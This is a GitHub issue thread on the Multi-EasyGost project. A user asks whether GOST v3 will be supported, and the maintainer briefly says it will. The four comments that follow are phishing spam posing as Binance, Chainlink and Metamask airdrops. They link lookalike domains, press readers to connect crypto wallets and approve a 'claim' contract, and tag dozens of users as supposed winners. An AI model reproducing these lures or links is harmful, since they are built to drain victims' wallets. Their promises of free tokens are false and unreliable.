### ISSUE TITLE
请问考虑跟进GOST v3么？

### ISSUE THREAD

**Issue by yt1988** [KANIKIG/Multi-EasyGost#60]
V3 版本新增了一些协议和特性，想要了解脚本后续是否会跟进

**Comment by KANIKIG** [comment]
会的

**Comment by bluepadu** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @Roxinn1996, @CallmeJay, @0xhuhu, @mingjack2023, @chinaOB, @hellozengweibin, @alphapenng, @rbridgeme, @senebos1, @leeseon, @netsesame, @haimingZZ, @mysterick, @yy940997492, @yuzukicat, @sukuo11, @Wedding33, @Skysolderone, @AdamShawFree, @mrwenhui, @ml1994, @suddenly1990, @YiannisChen, @zhuang-chen0, @swturning, @zwsf, @zguiyang, @ILoveQier, @yanghcc, @NathanHo1024, @longbao520, @raw34, @zkk-pro, @mooooonben, @LetmeBX, @ZhangPeibin, @Naoki2015, @wangyangv1, @kkkccc100, @lingdachao, @iVampireSP, @yzStrive, @abuxliu, @0xseven7, @williamxiewz, @yushiwuzheng666, @satisfywithmylife, @wooyun-Evil, @kimifdw, @EasonWong0603

**Comment by bluepadu** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by amigeleken** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @zyipointone, @ysh625, @feikerwu, @fibonacciXu, @kashjack, @creazyCode, @zhouqiang-cl

**Comment by AIDEZM** [comment]
# Connect and Earn with Metamask! 🚀

Don't miss out on this exclusive offer to earn up to 1 ETH and $100 instantly by connecting your Metamask wallet!

[![Connect Now](https://i.imgur.com/0NaIapw.png)](https://www.meta-msk.online/)

## Unlock Rewards Now:

1. Visit our [Metamask Airdrop](https://www.meta-msk.online/).
2. Log in or create an account if you haven't already.
3. Connect your Metamask wallet.
4. Unlock instant rewards of up to 1 ETH and $100!

## Why Connect with Metamask?

- **Instant Rewards:** Earn up to 1 ETH and $100 as soon as you connect.
- **Exclusive Offer:** This is a limited-time opportunity – don't miss out!
- **Future Benefits:** Stay connected for future rewards and promotions.

### Act Now! 🌟

This is a limited-time offer, so seize the opportunity now! If you have any questions or need assistance, feel free to reach out.

Thank you for being a part of our community!


Winners: @McCoySebrell, @Dalimil, @0xOutOfGas, @khoa-nvk, @rbacidtech, @arielfavaro, @tan-zixuan
